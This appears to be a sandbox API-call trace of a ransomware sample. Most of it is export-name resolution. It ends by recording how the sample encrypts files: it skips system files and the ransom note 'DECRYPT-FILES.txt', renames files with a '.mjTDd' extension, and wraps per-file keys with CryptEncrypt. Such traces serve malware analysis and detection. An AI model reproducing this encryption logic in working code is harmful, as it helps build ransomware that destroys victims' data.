lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.313] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.313] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.313] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.313] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.313] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.313] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.313] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.313] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.313] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.313] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.313] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.313] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.313] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.313] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.313] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.313] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.313] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.313] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.313] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.314] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.314] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.314] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.314] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.314] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.314] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.314] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.314] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.314] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.314] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.314] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.314] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.314] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.314] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.314] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.314] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.314] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.314] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.315] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.315] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.315] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.315] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.315] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.315] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.315] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.315] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.315] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.315] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.315] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.315] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.315] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.315] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.315] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.315] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.315] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.315] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.315] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.316] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.316] lstrlenA (lpString="DELETEATOM") returned 10 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.316] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.316] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.316] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.316] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.316] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.316] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.316] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.316] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.316] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.316] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.316] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.316] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.316] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.316] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.316] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.316] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.317] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.317] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.317] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.317] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.317] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.317] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.317] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.317] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.317] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.317] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.317] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.317] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.317] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.317] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.317] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.317] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.317] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.317] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.317] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.318] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.318] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.318] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.318] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.318] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.318] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.318] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.318] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.318] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp") returned 72 [0083.318] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp.mjTDd") returned 78 [0083.318] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\t48y4dl5edimegv6qg10.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp.mjTDd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\t48y4dl5edimegv6qg10.bmp.mjtdd"), dwFlags=0x0) returned 1 [0083.319] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.319] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.319] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.319] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2136340, ftCreationTime.dwHighDateTime=0x1d4d3e8, ftLastAccessTime.dwLowDateTime=0xb3e83730, ftLastAccessTime.dwHighDateTime=0x1d4c551, ftLastWriteTime.dwLowDateTime=0xb3e83730, ftLastWriteTime.dwHighDateTime=0x1d4c551, nFileSizeHigh=0x0, nFileSizeLow=0x5bd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgz_pfNl6IjRGQlG07.mp3", cAlternateFileName="WGZ_PF~1.MP3")) returned 1 [0083.319] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0083.319] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="autorun.inf") returned 1 [0083.320] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="boot.ini") returned 1 [0083.320] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="desktop.ini") returned 1 [0083.320] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="ntuser.dat") returned 1 [0083.320] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="iconcache.db") returned 1 [0083.320] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="bootsect.bak") returned 1 [0083.320] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="ntuser.dat.log") returned 1 [0083.320] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="thumbs.db") returned 1 [0083.320] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3", lpString2="Bootfont.bin") returned 1 [0083.320] lstrlenW (lpString="wgz_pfNl6IjRGQlG07.mp3") returned 22 [0083.320] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0083.320] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0083.320] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0083.320] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0083.320] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.320] lstrlenW (lpString="wgz_pfNl6IjRGQlG07.mp3") returned 22 [0083.320] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0083.320] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="wgz_pfNl6IjRGQlG07.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3" [0083.320] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\wgz_pfnl6ijrgqlg07.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0083.320] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=23509) returned 1 [0083.320] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0083.320] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.321] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.321] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.321] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.321] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.321] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.322] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) 